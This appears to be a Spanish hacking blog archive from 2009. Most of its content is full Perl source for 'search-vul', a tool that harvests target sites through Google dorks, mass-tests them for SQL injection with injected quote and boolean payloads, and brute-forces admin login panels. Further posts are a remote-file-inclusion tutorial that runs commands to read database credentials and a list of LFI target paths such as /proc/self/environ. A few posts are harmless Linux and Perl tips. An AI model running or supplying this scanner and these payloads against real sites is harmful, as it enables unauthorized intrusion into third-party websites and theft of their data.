skip to main | skip to sidebar
Yoyahack
El inteligente no es aquel que lo sabe todo sino aquel que sabe utilizar lo poco que sabe
RSS
  • Home
  • Admin
  • Undersecurity
  • CPAN - Perl
  • PHP

[optimisada] search-vul 0.3

Herramientas, Nivel web, perl, programacion 4 comentarios

Buenas aquí la versión 0.3 de search-vul, la eh optimizado bastante, gracias a C1c4Tr1Z por la idea que me dio para no estar haciendo peticiones a cada rato que hase el script vaya un poco mas lento, y al maestro OzX , eh puesto algunas de sus grandiosas tecnicas en sql....





=pod
Autor: Yoyahack
name: search-vul
verion: 0.3
Mail: yoyahack@undersecurity.net
Web: www.yoyahack.blogspot.com
Webs: www.undersecurity.net & www.mitm.cl
Gretz: S[e]C, seth, p0fk, ksha, OzX, protos, NorK, C1c4Tr1Z
_ _
___ ___ __ _ _ __ ___| |__ __ ___ _| |
/ __|/ _ \/ _` | '__/ __| '_ \ ____\ \ / / | | | |
\__ \ __/ (_| | | | (__| | | |_____\ V /| |_| | |
|___/\___|\__,_|_| \___|_| |_| \_/ \__,_|_|

=cut

#opciones
=pod
--google <busqueda> --num <numero> -> Buscar paginas de google.com y indica el numero de pagina a buscar
--googles <busqueda> --num <numero> -> Buscar pagina de distinto servidores googles
--vul <file.txt> -> Escanea un archivo que contenga distinta pagina y verifica las vurnerables
--dns <site> -> Reverse dns
=cut

#Modulos

use LWP::UserAgent;
use HTTP::Request;
use Getopt::Long;

#Code

print q(
·············································
Code
by
Yoyahack
www.yoyahack.blogspot.com
www.undersecurity.com & www.mitm.cl
·············································
);

print "Usage: perl $0 --opcion <xxx>\n";
print q(
--google <busqueda> --num <numero>
--googles <busqueda> --num <numero>
--vul <file.txt>
--dns <site>
);

#Opciones
GetOptions("google=s" => \$google,
"googles=s" => \$googles,
"vul=s" => \$vul,
"dns=s" => \$dns,
"num=s" => \$num);

if($google & $num){&google};
if($googles & $num ){&googles};
if($vul){&vul};
if($dns){&dns};

sub google{

###########################################################
my $peti = "http://www.google.com/search?hl=&q=$google&start=$num";
my $result = get($peti);

###########################################################
while ($result =~ m/<h3 class=.*?<a href="([^"]+).*?>(.*?)<\/a>/g) {

my $enlace = $1;
open (SE,">>busqueda.txt");
print SE "$enlace\n";
close (SE);
print "$enlace\n";
}
}



sub googles{

###########################################################
my @googles = qw(www.google.es www.google.cl www.google.com.ar www.google.co.ve);
foreach $go(@googles)
{
chomp($go);
###########################################################
my $peti1 = "http://$go/search?hl=&q=$googles&start=$num";
my $result1 = get($peti1);

###########################################################
while ($result1 =~ m/<h3 class=.*?<a href="([^"]+).*?>(.*?)<\/a>/g) {
my $enlace1 = $1;

open (SS,">>googles.txt");
print SS "$enlace1\n";
close (SS);
print "$enlace1\n";
}
}
}


sub vul{
###########################################################
open(PAG,$vul) || die "Archivo de texto no encontrado";
@urls=<PAG>;
close (PAG);
foreach $pag(@urls)
{
chomp($pag);
###########################################################
my $iny1 = $pag."'+and+1=1+--+";
my $iny2 = $pag."'+and+1=2+--+";
##########################################################
my $fuente = get($iny1);
my $tofo = scalar(split("\n",$fuente));

my $result = get($iny2);
my $todo = scalar(split("\n",$result));
##########################################################
if($tofo ne $todo){
open (VUL,">>vurl.txt");
print VUL q(
·············································
Code
by
Yoyahack
www.yoyahack.blogspot.com
www.undersecurity.com & www.mitm.cl
·············································

);
print VUL "$pag\n";
close (SS);
print "[+]$pag es vurnerable a SQLI\n";
print "!guardada exitosamente\n";
} else {
print "\n$pag no es vurnerable a SQLI\n";
}
}
}

sub dns{
my $result = get("http://www.ip-adress.com/reverse_ip/$dns");

while ($result =~ m!<a href="/whois/(.+)">Whois</a>!ig){

open (DNS,">>reverse_dns.txt");
print DNS "$1\n";
close (DNS);
print "$1\n";

}
if ($result =~ /valid IP address/) {

print "Not found\n";
}
}

sub get {
my $pagina = $_[0];

my $ua = new LWP::UserAgent;
$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12");

my $busqueda = new HTTP::Request GET => $pagina;
my $resultado = $ua->request($busqueda);
$ua->timeout(7) || die "Conecction faield";
my $result = $resultado->content();
}


13:26



search-vul 0.2

1comentarios

Bueno por fin termine la segunda version de mi tools.

search-vul 0.2

Caracteristica:



  1. Busca pagina mediante google
  2. Buscar paginas web mediante distinto servidores googles
  3. Opción para examinar un lista de paginas webs en busca de algunas vulnerables a sqli
  4. Reverse dns
  5. Buscador del panel de control



=pod
Autor: Yoyahack
name: search-vul
verion: 0.2
Mail: yoyahack@undersecurity.net
Web: www.yoyahack.blogspot.com
Webs: www.undersecurity.net & www.mitm.cl |
Descripcion: -> v
Busca pagina mediante googles o algunos servidores googles - Opcion para examinar un lista de pagininas webs
en busca de algunas vurnerables a sqli - Reverse dns - Buscador del panel de control
Gretz: S[e]C, seth, p0fk, ksha, OzX, protos, n0b0dy, NorK, C1c4Tr1Z
=cut

#Modulos

use LWP::UserAgent;
use HTTP::Request;

#Code
print q(
·············································
Code
by
Yoyahack
www.yoyahack.blogspot.com
www.undersecurity.com & www.mitm.cl
·············································
);
print q (

1- Solo www.google.com
2- En todos los servidores google
3- Escanear una lista de paginas guardada en un archivo
de texto en busca de vurnerabilidades
4- Reverse dns
5- Buscador de panel de control
);

print "Escoje una opcion: ";
$opcion = <STDIN>;

if ($opcion == 1) { &google }
if ($opcion == 2) { &googles }
if ($opcion == 3) { &vul }
if ($opcion == 4) { &dns }
if ($opcion == 5) { &panel }

sub google {

print "Escriba la palabra a buscar: ";
my $search = <STDIN>;

print "\nnumero de paginas: ";
my $num = <STDIN>;

#------------------------------------------------

my $ua = new LWP::UserAgent;
$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12");

#------------------------------------------------

for($i=1;$i<$num;$i++){
my $busqueda = new HTTP::Request GET =>"http://www.google.com/search?hl=&q=$search&start=$i";
my $resultado = $ua->request($busqueda);
$ua->timeout(7) || die "Conecction faield";
my $result = $resultado->content();

while ($result =~ m/<h3 class=.*?<a href="([^"]+).*?>(.*?)<\/a>/g) {
my ($enlace) = ($1);

open (SE,">>busqueda.txt");
print SE "$enlace\n";
close (SE);
print "$enlace\n";

}
}
}


sub googles {

print "Escriba la palabra a buscar\n";
my $bus1 = <STDIN>;

print "Numero de paginas a buscar en cada servidor google\n";
my $num1 = <STDIN>;

#------------------------------------------------

my $ua = new LWP::UserAgent;
$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12");

#------------------------------------------------

foreach $googles(@googles)
{
chomp($googles);

#------------------------------------------------

for($ii=1;$ii<$num1;$ii++){
my $busqueda1 = new HTTP::Request GET =>"http://$googles/search?hl=&q=$bus1&start=$ii";
my $resultado1 = $ua->request($busqueda1);
$ua->timeout(7) || die "Conecction faield";
my $result1 = $resultado1->content();

while ($result1 =~ m/<h3 class=.*?<a href="([^"]+).*?>(.*?)<\/a>/g) {
my ($enlace1) = ($1);

open (SS,">>googles.txt");
print SS "$enlace1\n";
close (SS);
print "$enlace1\n";

}
}
}
}


sub vul {

print "Escanear todas las url obtenida en busca de paginas vurnerables a Mysql? ";

print q(
1 = verificar las paginas vurnerables
2 = No verificar y salir del code
);
print "\nElige una opcion\n";

my $op2 = <STDIN>;

if ($op2 == 1) { &mysql }
if ($op2 == 2) { exit(0); }

}

sub mysql {

print q(
Nombre del archivo de texto
en el que esta guardado las listas de paginas

);
my $txt = <STDIN>;

#------------------------------------------------
open(PAG,$txt) || die "Archivo de texto no encontrado";
@urls=<PAG>;
close (PAG);
#------------------------------------------------

foreach $pag(@urls)
{
chomp($pag);

#------------------------------------------------
my $ua = new LWP::UserAgent;
$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12");
#------------------------------------------------

#------------------------------------------------
print "Comprovando paginas vurnerables a Mysql\n\n";

my $iny = $pag."'";
my $peti = new HTTP::Request GET =>"$iny";
my $resul = $ua->request($peti);
$ua->timeout(7) || die "Conecction faield to host";
my $fuente = $resul->content();

if($fuente =~ /mysql_fetch_/ || $fuente =~ /You have an error in your SQL syntax/ || $fuente =~ /tem um erro de sintaxe no seu SQL/ || $fuente =~ /Algo está equivocado en su sintax/ || $fuente =~ /Division by zero in/ || $fuente =~ /supplied argument is not a valid MySQL/){

open (VUL,">>vurl.txt");
print VUL q(
·············································
Code
by
Yoyahack
www.yoyahack.blogspot.com
www.undersecurity.com & www.mitm.cl
·············································

);
print VUL "$pag\n";
close (SS);
print "[+]$pag es vurnerable a SQLI\n";
print "\nLas paginas vurnerables han sido guardada exitosamente\nen un archivo de texto\n";
} else {
print "\n\n$pag no es vurnerable a SQL";
}
}
}

sub dns {


print "Ingresa la web\n";
my $web = <STDIN>;

my $ua = new LWP::UserAgent;
$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12");

my $busqueda = new HTTP::Request GET =>"http://www.ip-adress.com/reverse_ip/$web";
my $resultado = $ua->request($busqueda);
$ua->timeout(7) || die "Conecction faield";
my $result = $resultado->content();

while ($result =~ m!<a href="/whois/(.+)">Whois</a>!ig){

open (DNS,">>reverse_dns.txt");

print DNS "$1\n";
close (DNS);
print "$1\n";


}

if ($result =~ /valid IP address/) {

print "Not found\n";
}
}

sub panel{

print "Inserte la web\nEx:http://www.pagina.com/\n\n";

my $pag = <STDIN>;
chomp($pag);

#------------------------------------


@panel = ('admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
'memberadmin/','administratorlogin/','adm/','admin/account.php','admin/index.php','admin/login.php','admin/admin.php','admin/account.php',
'admin_area/admin.php','admin_area/login.php','siteadmin/login.php','siteadmin/index.php','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
'admin_area/index.php','bb-admin/index.php','bb-admin/login.php','bb-admin/admin.php','admin/home.php','admin_area/login.html','admin_area/index.html',
'admin/controlpanel.php','admin.php','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html',
'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html',
'admin/cp.php','cp.php','administrator/index.php','administrator/login.php','nsw/admin/login.php','webadmin/login.php','admin/admin_login.php','admin_login.php',
'administrator/account.php','administrator.php','admin_area/admin.html','pages/admin/admin-login.php','admin/admin-login.php','admin-login.php',
'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.php','modelsearch/login.php','moderator.php','moderator/login.php',
'moderator/admin.php','account.php','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.php','admincontrol.php',
'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.php','adminarea/index.html','adminarea/admin.html',
'webadmin.php','webadmin/index.php','webadmin/admin.php','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.php','moderator.html',
'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html',
'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html',
'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.php','account.html','controlpanel.html','admincontrol.html',
'panel-administracion/login.php','wp-login.php','adminLogin.php','admin/adminLogin.php','home.php','admin.php','adminarea/index.php',
'adminarea/admin.php','adminarea/login.php','panel-administracion/index.php','panel-administracion/admin.php','modelsearch/index.php',
'modelsearch/admin.php','admincontrol/login.php','adm/admloginuser.php','admloginuser.php','admin2.php','admin2/login.php','admin2/index.php',
'adm/index.php','adm.php','affiliate.php','adm_auth.php','memberadmin.php','administratorlogin.php'
);

#----------------------------------
print "Buscando panel de control\n";

foreach $panel(@panel) {
chomp($panel);


my $todo = "$pag"."$panel";
my $lwp = HTTP::Request->new(GET=>"$todo");
my $ua = LWP::UserAgent->new();
$ua->timeout(10);
my $response = $ua->request($lwp);
my $peti = $response->content();



if ($peti =~ /Username/ ||
$peti =~ /Password/ ||
$peti =~ /username/ ||
$peti =~ /password/ ||
$peti =~ /USERNAME/ ||
$peti =~ /PASSWORD/ ||
$peti =~ /Senha/ ||
$peti =~ /senha/ ||
$peti =~ /Personal/ ||
$peti =~ /Usuario/ ||
$peti =~ /Clave/ ||
$peti =~ /Usager/ ||
$peti =~ /usager/ ||
$peti =~ /Sing/ ||
$peti =~ /passe/ ||
$peti =~ /P\/W/ ||
$peti =~ /Admin Password/
){
open (P,">>panel de control");
print P "{+}Found -> $todo\n";
close (P);
print "{+}Found -> $todo\n";
}else{
print "$todo Not found\n";
}
}
}


17:51



Descargar openSUSE 11.1

0 comentarios


Bueno en esto día estuve probando este distrito.

Ps le dejo el link de descarga para lo que quieren descargarlo.

openSUSE 11.1



------------------------
32 bit - LiveCd

Descargar para KDE4

Descargar para GNOME

------------------------

64 bit - LiveCd

Descargar para KD4

Descargar para GNOME


------------------------

Saludos xD.


15:22



Cómo quemar un .ISO desde la linea de comandos

0 comentarios

Bueno aquí un simple comando para quemar un .ISO desde la linea de comando.

wodim name.iso

Opciones de wodim

man wodim

Saludos.


15:18



Encode text en html entities en perl

Herramientas, perl, programacion 0 comentarios

Bueno aquí mi code para que encode sus texto a html entities, muy bueno para los blogs.


#Autor: Yoyahack
#Webs: www.yoyahack.blogspot.com - www.undersecurity.net
#mail: elmafioso.edwin@gmail.com
#Encode strings with HTML entities

#Module

use HTML::Entities;

#Code

print "\nYoyahack - www.yoyahack.blogspot.com\nwww.undersecurity.net\n";
print "\nUsage: perl name.pl <archive.txt>\n";
print "Ex: perl script.pl archive.txt\n";

open(AR,"$ARGV[0]") || die "\nNot found archive\n";
@ar=<AR>;
close (AR);

foreach $encode(@ar)
{
chomp($encode);

encode_entities( $encode );

open (SAVE,">>encode_text.txt");
print SAVE "$encode\n";
close (SAVE);


}

print "\nSuccessfully saved text file!\n";
exit(0);


12:41



Reverse DNS en perl

Herramientas, Nivel web, perl, programacion 0 comentarios

Bueno aquí un reverse dns que acabo de codear.

Modo de uso:

perl name.pl www.pagina.com

Guardas las webs en un archivo de texto.

Code:


#Autor: Yoyahack
#Webs: www.yoyahack.blogspot.com - www.undersecurity.net
#Reverse dns

#Modulos

use LWP::UserAgent;
use HTTP::Request;

#Body

print q(
Reverse Dns by yoyahack
www.yoyahack.blogspot.com - www.undersecurity.net
);

print "Usage: perl script.pl <web>\n";
print "Ex: perl reversedns.pl www.pagina.com\n";
my $ua = new LWP::UserAgent;
$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12");

my $busqueda = new HTTP::Request GET =>"http://www.ip-adress.com/reverse_ip/$ARGV[0]";
my $resultado = $ua->request($busqueda);
$ua->timeout(7) || die "Conecction faield";
my $result = $resultado->content();

while ($result =~ m!<a href="/whois/(.+)">Whois</a>!ig){


open (DNS,">>reverse_dns.txt");
print DNS "$1\n";
close (DNS);
print "$1\n";

}


12:24



Paths LFI más allá de /etc/passwd by Refused

Nivel web, vurnerabilidad 0 comentarios

Bueno este post lo vi en infiernohacker, me pareció muy interesante.

/proc/

En el directorio /proc/ podemos ver información sobre el kernel, el sistema, hardware,etc.
Paths:
/proc/version
/proc/interrupts
/proc/meminfo
/proc/mounts
/proc/modules
/proc/partitions
/proc/filesystems
/proc/kallsyms
/proc/cpuinfo
/proc/cmdline




/proc/self

El diretorio /proc/self es un enlace al proceso en ejecución.
Paths:
/proc/self/environ




/proc/sys/

El directorio /proc/sys proporciona informacion pero tambien (siendo administrador) se pueden activar o desactivar caracteristicas del kernel.
Paths:
/proc/sys/fs
/proc/sys/dev/
/proc/sys/kernel/
/proc/sys/kernel/acct
/proc/sys/kernel/cap-bound
/proc/sys/kernel/domainname
/proc/sys/kernel/exec-shield
/proc/sys/kernel/exec-shield-randomize
/proc/sys/kernel/hostname
/proc/sys/kernel/hotplug
/proc/sys/kernel/modprobe
/proc/sys/kernel/version
/proc/sys/kernel/sysrq
/proc/sys/net/core/
/proc/sys/net/ipv4/
/proc/sys/vm/
/proc/sysvipc



/proc/net/

El directorio /proc/net muestra información sobre la configuracion de red del sistema.
Paths:
/proc/net/arp
/proc/net/atm
/proc/net/dev
/proc/net/dev_mcast
/proc/net/igmp
/proc/net/ip_conntrack
/proc/net/ip_tables_names
/proc/net/ip_mr_cache
/proc/net/ip_mr_vif
/proc/net/netstat
/proc/net/psched
/proc/net/raw
/proc/net/route
/proc/net/rt_cache
/proc/net/snmp
/proc/net/sockstat
/proc/net/tcp
/proc/net/tr_rif
/proc/net/udp
/proc/net/unix
/proc/net/wireless



/proc/driver/

El directorio /proc/driver contiene información sobre los drivers que se estan utilizando.

Fuente


15:13



Algunos addons para firefox

Nivel web 0 comentarios

Bueno aquí algunos addons, son muy bueno todos xD.

User Agent Switcher 0.7.2

Live HTTP Headers 0.15

Firebug 1.4.2


Saludos.


15:03



search-vul 0.1

Herramientas, Nivel web, perl, programacion 0 comentarios

Bueno aquí mi tools, sus característica son:

  1. Busca paginas mediante google
  2. Te da la opción de buscar paginas webs mediante distinto servidores google.
  3. Abre un archivo de texto en la que están guardada todas las web y verifica las posibles vulnerabilidades a sqli.
Ps aqui una captura


Descargar


17:48



Tutorial de reverse DNS

Nivel web 0 comentarios

Bueno este es un tutorial que hise hase un tiempo y como no lo habia publicado ps lo publico esta en un archivo pdf.

Descargar


20:02



Automatisador de busqueda de google en perl v0.2

Herramientas, Nivel web, perl, programacion 0 comentarios

Bueno este es la segunda version de google search en perl hecha por mi, ps en esta version guarda
los enlaces en un archivo de texto por default llamado 'enlaces.txt' si quieren alguna mejora ps decirlo.


#Autor:   Yoyahack

#Version: 0.2



use LWP::UserAgent;

use HTTP::Request;



print "Modo de uso:\n";

print "Perl name.pl <busqueda> <numeros de paginas>\n";

print "perl name.pl inurl:noticias.php?id=1 50\n";



my $ua = new LWP::UserAgent;

$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12");



for($i=1;$i<$ARGV[1];$i++){

    my $busqueda = new HTTP::Request GET =>"http://www.google.com/search?hl=es&q=.$ARGV[0].&start=$i&sa=N";

    my $resultado = $ua->request($busqueda);

    $ua->timeout(7);

    my $result = $resultado->content;



    while ($result =~ m/<h3 class=.*?<a href="([^"]+).*?>(.*?)<\/a>/g) {

        my ($enlace) = ($1);

        open (SAVE, ">>enlaces.txt");

        print SAVE "\n$enlace\n";

        print "$enlace\n";

        close(SAVE);

}

}

#Gretz:   S[e]C, seth, OzX, p0fk  


19:38



Creando un code en perl I

Nivel web, perl, programacion 0 comentarios

Bueno este es un tuto que hise de como llegue a crear un script en perl parte por parte, espero que sea muy explicativo.

Descargar


15:40



Automatisador de busqueda de google en perl

Herramientas, Nivel web, perl, programacion 0 comentarios

Bueno este script lo cree cuando comense a programar con sockets en perl, le agradesco a la comunidad undersecurity que me ayudo mucho y en especial a mi amigo s[e]c.

Modo de uso

perl script.pl noticias.php 10



#Autor: Yoyahack<br />

<br />

use LWP::UserAgent;<br />

use HTTP::Request;<br />

<br />

print "Modo de uso:\n";<br />

print "Perl name.pl \n";<br />

print "perl name.pl inurl:noticias.php?id=1 50\n";<br />

<br />

my $ua = new LWP::UserAgent;<br />

$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12");<br />

<br />

for($i=1;$i<$ARGV[1];$i++){<br />

my $busqueda = new HTTP::Request GET =>"http://www.google.es/search?hl=es&q=.$ARGV[0].&start=$i&sa=N";<br />

my $resultado = $ua->request($busqueda);<br />

$ua->timeout(7);<br />

my $result = $resultado->content;<br />

<br />

while ($result =~ m/

(.*?)<\/a>/g) {<br />

my ($enlace) = ($1);<br />

print "$enlace\n";<br />

}<br />

}<br />

#Agradesco a la comunidad undersecurity que me ayudo mucho en la elavoracion del code y a s[e]c que me ayudo con algunos #errorres


12:54



[Tutorial] Remoto file inclusion (RFI)

Nivel web, vurnerabilidad 0 comentarios

Que es Remoto file inclusión (RFI) ?
Remote file inclusión (Inclusión remota de archivo) esta vulnerabilidad que permite el enlace de
archivos remotos situados en otros servidores a causa de una mala programación de la página
que contiene la función include ().

Algunas funciones vulnerables a RFI son:

Include ()
Include_once ()
require ()
require_once ()

Por ejemplo:
En una parte del index.php esta este code:




Lo que hace este code es incluir archivos remotamente mediante la variable
$f.

www.pagina.com/index.php?f=caciones.php

Lo que esta haciendo es incluyendo archives mediante la variable f.
Entonces se explotaría de la siguiente forma:

www.pagina.com/index.php?f=http://tupagina.com/archivo.txt?

Bueno Recuerde que su code tiene que estar en extensión .txt .gif. .jpg etc.... menos en php
porque se ejecutaría en nuestro servidor.

Entonces creamos un archivo con extensión .txt y le ponemos el code que se ejecutaría en su
servidor, bueno en este caso yo le pondré este:





Que sirve para ejecutar comandos en el servidor y se explotaría de la siguiente manera:

www.pagina.com/index.php?page=http//www.tupafina.com/archivo.txt?cmd=cat
config

Lo que estaría viendo la configuración de la BD y poder sacar el password de la BD.


10:49



Bienvenidos

Offtopic 1comentarios

Wenas a todos, bienvenido a mi blog donde intentare compartir mis conocimientos con todas las personas que les interes.

Saludos.


10:44



Entradas más recientes Inicio
Suscribirse a: Entradas (Atom)

    Fedora 15

    FayerWayer

    Cargando...

    Twitter

    Follow @Yoyahack

    Categoria

    • Captcha (1)
    • Exploit (1)
    • Herramientas (10)
    • MYSQL (2)
    • Nivel web (24)
    • Noticias (2)
    • Offtopic (2)
    • perl (11)
    • php (12)
    • POO (1)
    • programacion (19)
    • Regexp (2)
    • Tips (1)
    • vurnerabilidad (7)
    • XSS (2)

    Blog Archive

    • ►  2012 (1)
      • ►  abril (1)
    • ►  2011 (6)
      • ►  octubre (1)
      • ►  septiembre (1)
      • ►  agosto (1)
      • ►  junio (1)
      • ►  marzo (2)
    • ►  2010 (10)
      • ►  octubre (2)
      • ►  septiembre (1)
      • ►  agosto (1)
      • ►  junio (1)
      • ►  abril (2)
      • ►  febrero (3)
    • ▼  2009 (15)
      • ▼  noviembre (1)
        • [optimisada] search-vul 0.3
      • ►  octubre (1)
        • search-vul 0.2
      • ►  septiembre (10)
        • Descargar openSUSE 11.1
        • Cómo quemar un .ISO desde la linea de comandos
        • Encode text en html entities en perl
        • Reverse DNS en perl
        • Paths LFI más allá de /etc/passwd by Refused
        • Algunos addons para firefox
        • search-vul 0.1
        • Tutorial de reverse DNS
        • Automatisador de busqueda de google en perl v0.2
        • Creando un code en perl I
      • ►  agosto (3)
        • Automatisador de busqueda de google en perl
        • [Tutorial] Remoto file inclusion (RFI)
        • Bienvenidos

    Afiliados

    • ANTRAX
    • drvy
    • hachik0
    • Ksha
    • kt0sh
    • Lord RNA
    • Panic
    • pks
    • seth
    • SH4V
    • snakingmax